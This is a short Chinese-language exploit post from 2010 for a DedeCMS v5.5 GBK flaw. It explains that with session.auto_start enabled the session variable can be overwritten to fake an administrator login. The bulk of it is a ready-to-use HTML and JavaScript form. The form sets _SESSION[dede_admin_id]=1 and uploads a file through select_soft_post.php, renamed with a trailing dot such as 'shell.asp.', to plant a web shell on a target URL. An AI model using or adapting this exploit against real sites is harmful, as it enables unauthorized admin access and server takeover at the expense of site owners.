DEDECMS v5.5 GBK Final 的一个鸡肋漏洞

在session.auto_start开启的情况下可以任意覆盖$_SESSION变量，我们可以伪造管理员登录并上传文件

/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php

上传时重命名为    *.php.
即可绕过检查上传shell

exp:

<form action= "" method='POST' enctype="multipart/form-data">
    U R L:<input type= "text" name= "target" size= "50" value= "http://192.168.1.110">  
    Path:<input type="text" name="path" value="/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php" size="90"><br>
File: <input type='file' name='uploadfile' size='25' />(Filetype must be GIF/JPEG etc)       
            RenameTo:<input type='test' name='newname' value="shell.asp."/><br>
             
        <input type=hidden name="_SESSION[dede_admin_id]" value=1>
                <input type=hidden name="bkurl" value=1>
            <input type='button' value='submit' onclick="fsubmit()"/><br><br><br><br><br><br>
        dedecms 0day exp..<br>
        need: session.auto_start = 1<br>
        By toby57        2010/2/22
    </form>
<script>
function fsubmit(){
        var form = document.forms[0];
        form.action = form.target.value + form.path.value;
        tmpstr = form.target.value +'/'+ form.newname.value;
        form.bkurl.value = tmpstr.substr(0,tmpstr.length-1);
        form.submit();
        }
</script>